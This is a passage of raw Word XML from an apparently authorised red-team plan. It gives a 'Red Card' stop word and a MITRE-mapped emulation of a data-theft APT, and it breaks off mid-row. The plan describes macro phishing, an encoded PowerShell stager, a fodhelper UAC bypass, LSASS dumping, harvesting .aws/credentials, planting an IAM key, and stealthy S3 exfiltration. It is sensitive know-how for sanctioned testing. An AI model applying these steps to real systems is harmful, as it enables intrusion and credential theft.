            </w:pPr>
            <w:r>
              <w:t>Name and contact details of the prim</w:t>
            </w:r>
            <w:r w:rsidR="008B6D90">
              <w:t>ary White Team representative.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B736C5" w14:paraId="498E09C9" w14:textId="77777777" w:rsidTr="00B736C5">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E27855B" w14:textId="77777777" w:rsidR="00B736C5" w:rsidRDefault="00B736C5" w:rsidP="008B6D90">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Emergency Stop Word</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D33DC0E" w14:textId="77777777" w:rsidR="00B736C5" w:rsidRDefault="00B736C5">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>"Red Card"</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> – Immediate cessation of all activity and notification to the White Team within 5 minutes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="691A31DE" w14:textId="77777777" w:rsidR="00B736C5" w:rsidRDefault="00B736C5" w:rsidP="00B736C5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc215571135"/>
      <w:r>
        <w:t>Threat Emulation Plan</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="2CF8074A" w14:textId="25412F69" w:rsidR="00B736C5" w:rsidRDefault="00B736C5" w:rsidP="00B736C5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r w:rsidRPr="003C4B8A">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:color w:val="002060"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Adversary Persona</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> APT-Shield (An emulation of a data-theft focused APT, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D07609">
        <w:t>prioritising</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> stealth and cloud pivot).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509"/>
        <w:gridCol w:w="2176"/>
        <w:gridCol w:w="1800"/>
        <w:gridCol w:w="3865"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B736C5" w14:paraId="526210C1" w14:textId="77777777" w:rsidTr="003C688D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1464" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="423C5C1A" w14:textId="77777777" w:rsidR="00B736C5" w:rsidRPr="003C688D" w:rsidRDefault="00B736C5" w:rsidP="00AB0C50">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="002060"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C688D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="002060"/>
              </w:rPr>
              <w:t>Phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2146" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20A63075" w14:textId="77777777" w:rsidR="00B736C5" w:rsidRPr="003C688D" w:rsidRDefault="00B736C5">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="002060"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C688D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="002060"/>
              </w:rPr>
              <w:t>Goal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1770" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="229DB845" w14:textId="77777777" w:rsidR="003C4B8A" w:rsidRPr="003C688D" w:rsidRDefault="00B736C5" w:rsidP="003C4B8A">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="002060"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C688D">
              <w:rPr>
                <w:b/>
                <w:color w:val="002060"/>
              </w:rPr>
              <w:t>TTPs Used</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17B2F8A6" w14:textId="77777777" w:rsidR="00B736C5" w:rsidRPr="003C688D" w:rsidRDefault="00B736C5" w:rsidP="003C4B8A">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="002060"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C688D">
              <w:rPr>
                <w:b/>
                <w:color w:val="002060"/>
              </w:rPr>
              <w:t>(MITRE ID)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3820" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47F9BA04" w14:textId="77777777" w:rsidR="00B736C5" w:rsidRPr="003C688D" w:rsidRDefault="00B736C5">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="002060"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C688D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="002060"/>
              </w:rPr>
              <w:t>Procedure &amp; Technique Summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B736C5" w14:paraId="0715EC21" w14:textId="77777777" w:rsidTr="003C688D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1464" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1729AC22" w14:textId="77777777" w:rsidR="00B736C5" w:rsidRDefault="00B736C5" w:rsidP="00AB0C50">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Initial Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2146" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34BD5D08" w14:textId="513C1DD3" w:rsidR="00B736C5" w:rsidRDefault="00B736C5">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Gain </w:t>
            </w:r>
            <w:r w:rsidR="00D07609">
              <w:t xml:space="preserve">a </w:t>
            </w:r>
            <w:r>
              <w:t>foothold on an internal AD workstation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1770" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FA6DD16" w14:textId="77777777" w:rsidR="00B736C5" w:rsidRDefault="00B736C5">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">T1566.001: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Spearphishing</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> Attachment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3820" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F7C8563" w14:textId="77777777" w:rsidR="00B736C5" w:rsidRDefault="00B736C5">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:t>Send a malicious document (macro-enabled) to a target user, bypassing standard email gateway checks.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B736C5" w14:paraId="4F5C436E" w14:textId="77777777" w:rsidTr="003C688D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1464" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F105433" w14:textId="77777777" w:rsidR="00B736C5" w:rsidRDefault="00B736C5" w:rsidP="00AB0C50">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Execution/PE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2146" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="607B1ACB" w14:textId="13B8D107" w:rsidR="00B736C5" w:rsidRDefault="00B736C5">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Run </w:t>
            </w:r>
            <w:r w:rsidR="00D07609">
              <w:t xml:space="preserve">a </w:t>
            </w:r>
            <w:r>
              <w:t>malicious payload and escalate local privileges.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1770" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DBFB7BC" w14:textId="77777777" w:rsidR="00B736C5" w:rsidRDefault="00B736C5">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:t>T1059.001: PowerShell &amp; T1548.002 Bypass UAC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3820" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6EF886E7" w14:textId="575741E2" w:rsidR="00B736C5" w:rsidRDefault="00B736C5">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Use an encoded PowerShell command to run the C2 stager. </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00D07609">
              <w:t>Utilise</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> a known UAC bypass technique (e.g., </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A837BD">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>fodhelper</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">) to gain </w:t>
            </w:r>
            <w:r w:rsidR="00D07609">
              <w:t xml:space="preserve">a </w:t>
            </w:r>
            <w:r>
              <w:t>high-integrity shell for system-level operations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B736C5" w14:paraId="7211B7EC" w14:textId="77777777" w:rsidTr="003C688D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1464" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2193A203" w14:textId="77777777" w:rsidR="00B736C5" w:rsidRDefault="00B736C5" w:rsidP="00AB0C50">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t xml:space="preserve">Lateral Movement </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>(On-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Prem</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2146" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37BB18C5" w14:textId="77777777" w:rsidR="00B736C5" w:rsidRDefault="00B736C5">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Acquire credentials for the Domain </w:t>
            </w:r>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Administrator or a high-privilege service account used for hybrid access.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1770" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1FB20294" w14:textId="77777777" w:rsidR="00B736C5" w:rsidRDefault="00B736C5">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">T1003.001: OS Credential </w:t>
            </w:r>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Dumping (LSASS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3820" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B19A669" w14:textId="3B572F03" w:rsidR="00B736C5" w:rsidRDefault="00B736C5">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Use a </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00AB3F18">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>procDump</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00AB3F18">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>-like</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> utility to retrieve cached AD credentials, </w:t>
            </w:r>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">targeting the </w:t>
            </w:r>
            <w:r w:rsidRPr="00A837BD">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>SVC_AWS_SYNC</w:t>
            </w:r>
            <w:r w:rsidRPr="00A837BD">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>service account.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B736C5" w14:paraId="485808B8" w14:textId="77777777" w:rsidTr="003C688D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1464" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CC9D844" w14:textId="77777777" w:rsidR="00B736C5" w:rsidRDefault="00B736C5" w:rsidP="00AB0C50">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Discovery (Hybrid)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2146" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="567A622C" w14:textId="77777777" w:rsidR="00B736C5" w:rsidRDefault="00B736C5">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:t>Find the key to pivoting from the on-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>prem</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> AD network into the AWS environment.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1770" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3015180A" w14:textId="77777777" w:rsidR="00B736C5" w:rsidRDefault="00B736C5">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:t>T1083: File and Directory Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3820" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3447FA3F" w14:textId="77777777" w:rsidR="00B736C5" w:rsidRDefault="00B736C5">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:t>Search the compromised on-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>prem</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> servers for misconfigured AWS credentials or configuration files (</w:t>
            </w:r>
            <w:r w:rsidRPr="003C688D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003C688D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>aws</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003C688D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>/credentials</w:t>
            </w:r>
            <w:r w:rsidRPr="003C688D">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003C688D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>config</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B736C5" w14:paraId="265830F7" w14:textId="77777777" w:rsidTr="003C688D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1464" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74535FC5" w14:textId="77777777" w:rsidR="00B736C5" w:rsidRDefault="00B736C5" w:rsidP="00AB0C50">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Persistence (Cloud)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2146" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D8DFC1B" w14:textId="77777777" w:rsidR="00B736C5" w:rsidRDefault="00B736C5">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:t>Establish access directly within the AWS VPC without relying on the on-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>prem</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> beachhead.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1770" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B0D753F" w14:textId="77777777" w:rsidR="00B736C5" w:rsidRDefault="00B736C5">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:t>T1098.004: Cloud Account Manipulation: Create Access Key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3820" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E57B8C5" w14:textId="77777777" w:rsidR="00B736C5" w:rsidRDefault="00B736C5">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:t>Use the captured credentials to create a new, legitimate-looking IAM user/role access key with basic read/write access to S3.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B736C5" w14:paraId="640D2668" w14:textId="77777777" w:rsidTr="003C688D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1464" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="205B2D94" w14:textId="77777777" w:rsidR="00B736C5" w:rsidRDefault="00B736C5" w:rsidP="00AB0C50">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Collection (Cloud)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2146" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64F042EE" w14:textId="77777777" w:rsidR="00B736C5" w:rsidRDefault="00B736C5">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:t>Locate and compress the target data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1770" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70449F31" w14:textId="77777777" w:rsidR="00B736C5" w:rsidRDefault="00B736C5">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:t>T1537: Transfer Data to Cloud Account</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3820" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="139C08E0" w14:textId="77777777" w:rsidR="00B736C5" w:rsidRDefault="00B736C5">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Identify the S3 bucket </w:t>
            </w:r>
            <w:r w:rsidRPr="003C688D">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003C688D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>cpc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003C688D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>-research-data-staging</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">) containing the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003C688D">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>confidential_research_data.json</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> file.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B736C5" w14:paraId="2E5018DF" w14:textId="77777777" w:rsidTr="003C688D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1464" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="678743FD" w14:textId="77777777" w:rsidR="00B736C5" w:rsidRDefault="00B736C5" w:rsidP="00AB0C50">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2146" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B482371" w14:textId="77777777" w:rsidR="00B736C5" w:rsidRDefault="00B736C5">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:t>Steal the collected data without triggering network alerts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1770" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29847A6C" w14:textId="77777777" w:rsidR="00B736C5" w:rsidRDefault="00B736C5">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:r>
              <w:t>T1048.003: Exfiltration Over Unencrypted/Obscured Non-C2 Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3820" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A5948F1" w14:textId="1405B1C2" w:rsidR="00B736C5" w:rsidRDefault="00D07609">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Utilise</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00B736C5">
              <w:t xml:space="preserve"> the newly created IAM user's credentials to execute a single, low-volume </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
